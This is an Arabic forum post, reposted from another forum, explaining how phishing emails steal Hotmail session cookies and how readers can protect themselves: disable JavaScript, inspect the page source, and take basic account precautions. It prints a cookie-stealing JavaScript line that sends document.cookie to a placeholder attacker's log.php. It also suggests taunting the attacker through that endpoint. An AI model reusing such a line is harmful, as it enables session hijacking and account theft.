بسم الله الرحمن الرحيم


اليوم سويت شرح كافى لموضوع سرقة بريد الهوت ميل

وهى طريقة سرقة ملف الكوكيز الخاص بك بعد دخولك على موقع السارق

ماعلينا اليوم بعد ماتقرأ الموضوع انسى ان اى هكر يضحك عليك تانى

نبتدى الشرح

نفترض ان جاتك رساله على بريدك ومضمونها

اهلا بيك يا فلان

مبروك ربحت مبلغ وقدره معانا

ادخل بسرعة على الرابط التالي عشان تاخد الفلووس

www.xxx.com

طبعا انت فرحت ودخلت علطوووووووووول

وبعد ماخشيت مالقيت شي

ولقيت صفحة بيضاء وفاضيه

قلت خساره مافيه شي .. وقفلت الصفحه

طبعا بعدها بدقايق المخترق جاته رساله ملف الكوكيز تبعك

ودخل غير كل البيانات حقك

وراح الاميل عليك ..

طبعا انت بتقول ان الاميل انا كنت حتميه وعمرى ماقبلت من حد حاجه كيف ينسرق ؟

وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين

واخترق منتداك بعد

وكل هذا من ايميلك

لا لا لا لا

الحين جا دورك عشان تضحك على هالاشكال ..

خليكم معايا وفتحو اذاينكم وعواينكم ..


هذي مثلا الرساله الى جاتك وكان فيه الرابط المشؤوم

لا تفك الرابط الا عقب تطبيق اللي بالشرح اوككككيك ؟

روح على tools او ادوات بعدين على الانترنت اوبشن .. او خيارات الانترنت



بعدين على هنا ..


بعدين اعمل تعطيل للجافا سكربيت او Active scripting


http://up2.arabsh.com/2007/d3647.bmp

الان انت فى امان ولو فتحت الصفحة ما راح ينسرق ملف الكوكيز تبعك

ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا معطله

طب بعد دخولك الصفحة ما لقيت حاجه وتبغي تتاكد انت ان هذا واحد يبغى يسرقك او لا وش تسوي ؟

فى وسط الصفحة اضغط كليك يمين بالماوس

واختار view sours

بتجيك صفحة نوت باد او مفكره

وفيها اكواد وحاجات

المهم دور على الكود هذا


انتم شايفين هذا عباره عن كود وفى اخره رابط الاسكربت حق المخترق حتى يسرق الكوكيز

وهذا الملف حق سرقة الكوكيز مسوينه بخاصية الجافا سكربت عشان كذا قلنا اقفل الجافا

طبعا انت بتشوفو الرابط الى فى اخر الكود

www.xxx.com/vb/add.js

طيب انت عرفت المصدر

الحين انت تبغى تحرق دمه

وتعلمه انك فاهم وماينضحك عليك

ادخل على المتصفح

وحط الرابط هذا نفسه اللي طلع لك فوق

www.xxx.com/vb/add.js

بيطلب منك تحمله

حمله على جهازك

واختر من القائمة اوبن وذ او فتح بواسطة .. وافتحه فى النوت باد او المفكرة


طبعا انت دخلت على ملف الجافا سكربت لقيته كذا

طبعا انت مو فاهم ايش هذا ؟؟؟؟؟؟

اقولك انا يا سيدى

هذا ملف سرقة الكوكيز

تبغى الحين تجننه وتخليه يشيييييييييط

lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie);

طبعا هو فى الملف log.php فيه اميل المخترق

الحين احنا نبغى نوصله التحية والسلام ونعرفه ان لعبته انكشفت

اكتب

www.xxxxx.com/xxx/log.php?index=' وهنا اكتب الكلام الى تبغاه يوصل للضحية

مثل

http://up2.arabsh.com/2007/ef8dc.bmp


www.xxxxx.com/xxx/log.php?index=' يا اهبل العب غيرها ( دكتور منشى)

طبعا علطول بيروح تبيلغ للهاكر ان الكوكيز بتاعه جاله

وبيدخل وهو مبسوووط

وبيلقى فى الرساله الكوكيز الكلام اللي كتبته


طبعا هو ممكن ينفجر من الغيظ

وطبعا ماراح يقدر يلعب معاك مره ثانيه

ونصيحة للجميع

1عمل للاميل سؤال واجابه

2 اميل التبيلغ فى حالة استرجاع الباس

3 تغيرالباس ديما حين دخولك اى صفحة غير موثوق فيها

4 تنزيل برنامج حماية للجهاز للحماية من ملفات التجسس

وبكدا يكون اميلك محمي بدرجة كبيره ان شاء الله



منقول الشرح من منتديات ترايد نت للأمانه بتصرف خفيف



تحــياتــي ..اميرالغرباء:

منتديات مدرسة المشاغبين - الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus

صمتي جوابي